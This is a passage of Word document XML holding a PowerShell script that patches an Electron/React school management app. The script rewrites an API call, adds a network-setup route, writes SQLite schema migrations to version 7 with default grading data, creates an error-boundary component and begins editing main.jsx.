        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B56E33D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $dataExportPath = Join-Path $root "src\pages\DataExport.jsx"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D60A9C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (Test-Path $dataExportPath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A864D73">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = Get-Content $dataExportPath -Raw -Encoding UTF8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B4894BC3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace "var report = await window\.electronAPI\.invoke\('emisCompileReport', selYear, 1\);", "var report = await window.electronAPI.emisCompileReport(selYear, 1);"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E994FC8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Set-Content -Path $dataExportPath -Value $c -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2CB4F5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAC124E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="94FE2C7C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># 2.7 Fix Router</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E0BBE746">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $routerPath = Join-Path $root "src\router\router.jsx"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9674FF57">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (Test-Path $routerPath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6E3E12">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = Get-Content $routerPath -Raw -Encoding UTF8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D387908">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ($c -notmatch "NetworkSetup") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9DEAAB6B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $c = $c -replace "const Settings = React\.lazy\(\(\) =&gt; import\('\.\./pages/Settings\.jsx'\)\);", "const Settings = React.lazy(() =&gt; import('../pages/Settings.jsx'));`nconst NetworkSetup = React.lazy(() =&gt; import('../pages/NetworkSetup.jsx'));"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091AB0EA">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $c = $c -replace "\{ path: 'settings', element: &lt;ProtectedRoute isLocked=\{isLocked\}&gt;&lt;Settings /&gt;&lt;/ProtectedRoute&gt; \},", "{ path: 'settings', element: &lt;ProtectedRoute isLocked={isLocked}&gt;&lt;Settings /&gt;&lt;/ProtectedRoute&gt; },`n { path: 'network-setup', element: &lt;ProtectedRoute isLocked={isLocked}&gt;&lt;NetworkSetup /&gt;&lt;/ProtectedRoute&gt; },"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310C37A8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FD34D5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Set-Content -Path $routerPath -Value $c -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018A56B4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C63D947B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="DBFE9928">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># ═══ 3. FIX MIGRATIONS.JS ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA81166">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "[3/15] Writing Migrations v7..." -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B2687D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $migPath = Join-Path $root "electron\migrations.js"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23669FD7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $newMigContent = @'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F4C6F5F0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>const { app } = require('electron');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F4A90E4E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>module.exports = function (db, saveDb) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8A5D991C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    var v = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D54627D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="ADC70A84">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        var r = db.exec("SELECT value FROM system_settings WHERE key = 'emis_db_version'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F82E687D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if (r.length &gt; 0 &amp;&amp; r[0].values.length &gt; 0) { v = parseInt(r[0].values[0][0]) || 0; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B858B254">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    } catch (e) { console.log('Version check error: ' + e.message); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A69B2C12">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DC7499E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (v &gt;= 7) { console.log('Database already up to date (v7)'); return; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21825F49">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    console.log('Running migrations: v' + v + ' -&gt; v7...');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="985C42A8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="595A1681">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (v &lt; 5) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E8895358">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        var cols1 = ["ALTER TABLE students ADD COLUMN other_name TEXT", "ALTER TABLE students ADD COLUMN emis_student_id TEXT", "ALTER TABLE staff ADD COLUMN tsc_number TEXT DEFAULT ''", "ALTER TABLE users ADD COLUMN security_question TEXT"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="835B8AA2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for (var i = 0; i &lt; cols1.length; i++) { try { db.run(cols1[i]); } catch (e) {} }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067FC60E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        var tables = ["CREATE TABLE IF NOT EXISTS school_registration (id INTEGER PRIMARY KEY, school_name TEXT)", "CREATE TABLE IF NOT EXISTS academic_years (id INTEGER PRIMARY KEY AUTOINCREMENT, year_name TEXT)", "CREATE TABLE IF NOT EXISTS student_enrollment (id INTEGER PRIMARY KEY AUTOINCREMENT, student_id INTEGER)", "CREATE TABLE IF NOT EXISTS infrastructure (id INTEGER PRIMARY KEY AUTOINCREMENT, classrooms_permanent INTEGER DEFAULT 0)", "CREATE TABLE IF NOT EXISTS uneb_candidates (id INTEGER PRIMARY KEY AUTOINCREMENT, student_id INTEGER)", "CREATE TABLE IF NOT EXISTS meeting_minutes (id INTEGER PRIMARY KEY AUTOINCREMENT, meeting_type TEXT)", "CREATE TABLE IF NOT EXISTS deduction_types (id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT)"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E052DE02">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for (var i = 0; i &lt; tables.length; i++) { try { db.run(tables[i]); } catch (e) {} }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1E0E1D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CC77EBA5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="CFB944EE">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (v &lt; 6) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="95D874C9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        db.run("CREATE TABLE IF NOT EXISTS schools (id INTEGER PRIMARY KEY AUTOINCREMENT, school_name TEXT NOT NULL, emis_number TEXT, school_level TEXT DEFAULT 'Primary', school_type TEXT DEFAULT 'Private', is_active INTEGER DEFAULT 1)");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0999D1EF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        var t = ['students','staff','classes','subjects','payments','attendance','marks','discipline','expenses','payroll_payments','fees_structure','visitors','library_books','canteen_items','transport_routes','student_requirements','nursery_assessments','infrastructure','latrines','textbooks','school_finances_emis','wash_data','health_nutrition','governance_members','dropout_records','meeting_minutes','purchase_requests','bank_payments','payment_transactions','student_documents','parent_profiles','student_timeline','special_needs_learners','ovc_data','student_enrollment','uneb_candidates','canteen_sales','audit_log','users'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="ABA7C1ED">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for (var i = 0; i &lt; t.length; i++) { try { db.run("ALTER TABLE " + t[i] + " ADD COLUMN school_id INTEGER DEFAULT 1"); } catch (e) {} }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="AFCE3838">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CD80D1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="D671B80A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (v &lt; 7) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9EA0EF98">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        try { db.run("ALTER TABLE students ADD COLUMN system_uuid TEXT"); } catch(e) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0EBFD4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        try { db.run("ALTER TABLE students ADD COLUMN birth_certificate TEXT"); } catch(e) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EB6C59">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        try { db.run("ALTER TABLE students ADD COLUMN emergency_contact_name TEXT"); } catch(e) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D0434219">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        try { db.run("ALTER TABLE students ADD COLUMN emergency_contact_phone TEXT"); } catch(e) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C3C46636">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        try { db.run("ALTER TABLE students ADD COLUMN blood_group TEXT"); } catch(e) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196095AA">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        try { db.run("ALTER TABLE classes ADD COLUMN stream_name TEXT"); } catch(e) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FF4E3491">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CA2D82C2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        db.run("CREATE TABLE IF NOT EXISTS sickbay_log (id INTEGER PRIMARY KEY AUTOINCREMENT, student_id INTEGER, date TEXT, complaint TEXT, treatment TEXT, status TEXT)");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CF95EDC2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        db.run("CREATE TABLE IF NOT EXISTS grading_systems (id INTEGER PRIMARY KEY AUTOINCREMENT, level TEXT, min_score INTEGER, grade TEXT, remark TEXT)");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BEF563B6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        db.run("CREATE TABLE IF NOT EXISTS staff_clockins (id INTEGER PRIMARY KEY AUTOINCREMENT, staff_id INTEGER, clock_in_time DATETIME, clock_out_time DATETIME)");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F930614">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AC8E66">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        var defaultGrades = [['Primary', 80, 'D1', 'Excellent'], ['Primary', 75, 'D2', 'Very Good'], ['Primary', 70, 'C3', 'Good'], ['Primary', 65, 'C4', 'Good'], ['Primary', 60, 'C5', 'Fair'], ['Primary', 55, 'C6', 'Fair'], ['Primary', 50, 'P7', 'Pass'], ['Primary', 45, 'P8', 'Pass'], ['Primary', 0, 'F9', 'Fail']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6391D52D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for (var i = 0; i &lt; defaultGrades.length; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64630F78">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            db.run("INSERT INTO grading_systems (level, min_score, grade, remark) VALUES (?, ?, ?, ?)", defaultGrades[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D018798">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05591410">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB956DD">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="C2EAC92D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    db.run("INSERT OR REPLACE INTO system_settings (key, value) VALUES ('emis_db_version', '7')");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5EF4B8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    try { db.run("VACUUM"); console.log('  [VACUUM] Database optimized.'); } catch(e) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D23AF75">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    saveDb();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E0DF6955">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    console.log('Migrations complete! (v7)');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DCB03B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CE191369">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>'@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E7114E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Set-Content -Path $migPath -Value $newMigContent -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="954FA7F0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="D7D39FC0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># ═══ 4. CREATE ERROR BOUNDARY COMPONENT ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289FB944">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "[4/15] Creating Error Boundary..." -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D0AE7746">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $ebPath = Join-Path $root "src\components\ErrorBoundary.jsx"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693E8E68">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $ebContent = @'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1902128B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>import React from 'react';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAC6BAC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>export default class ErrorBoundary extends React.Component {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57757A05">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    constructor(props) { super(props); this.state = { hasError: false, error: null }; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC9DCFB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    static getDerivedStateFromError(error) { return { hasError: true, error: error }; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47314844">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    componentDidCatch(error, errorInfo) { console.error('Application Crash:', error, errorInfo); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0194262A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    render() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08357FDB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if (this.state.hasError) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F21EF3B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            return (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B1A66645">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;div style={{ padding: '40px', textAlign: 'center', fontFamily: 'sans-serif' }}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8688F31D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;h1 style={{ color: '#d32f2f', marginBottom: '10px' }}&gt;⚠️ System Hiccup&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="833E62DA">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;p style={{ color: '#555', marginBottom: '20px' }}&gt;The application encountered an unexpected error. You can try reloading.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A50C1537">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;button onClick={() =&gt; window.location.reload()} style={{ padding: '10px 20px', background: '#1a73e8', color: 'white', border: 'none', borderRadius: '8px', cursor: 'pointer', fontSize: '16px' }}&gt;Reload Application&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5487E497">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="AA7EE06C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799E5755">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="983B558B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return this.props.children;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD0058C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FEEA9291">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045ECF3A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>'@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D1717113">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Set-Content -Path $ebPath -Value $ebContent -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429EA31F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36AA392C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># ═══ 5. FIX main.jsx ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CB1995F2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "[5/15] Fixing main.jsx..." -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679B57E3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $mainJsxPath = Join-Path $root "src\main.jsx"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703FB760">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (Test-Path $mainJsxPath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="97B919E5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = Get-Content $mainJsxPath -Raw -Encoding UTF8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A8CA1770">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace "(?s)(var root = ReactDOM\.createRoot.*?root\.render\([\s\S]*?\);\s*){2,}", '$1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EAD993">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ($c -notmatch "react-hot-toast") { $c = "import { Toaster } from 'react-hot-toast';`n" + $c }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46734632">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ($c -notmatch "ErrorBoundary") { $c = "import ErrorBoundary from './components/ErrorBoundary.jsx';`n" + $c }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5037BAFD">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DEBE4B1A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $newRender = @'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="99F70472">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
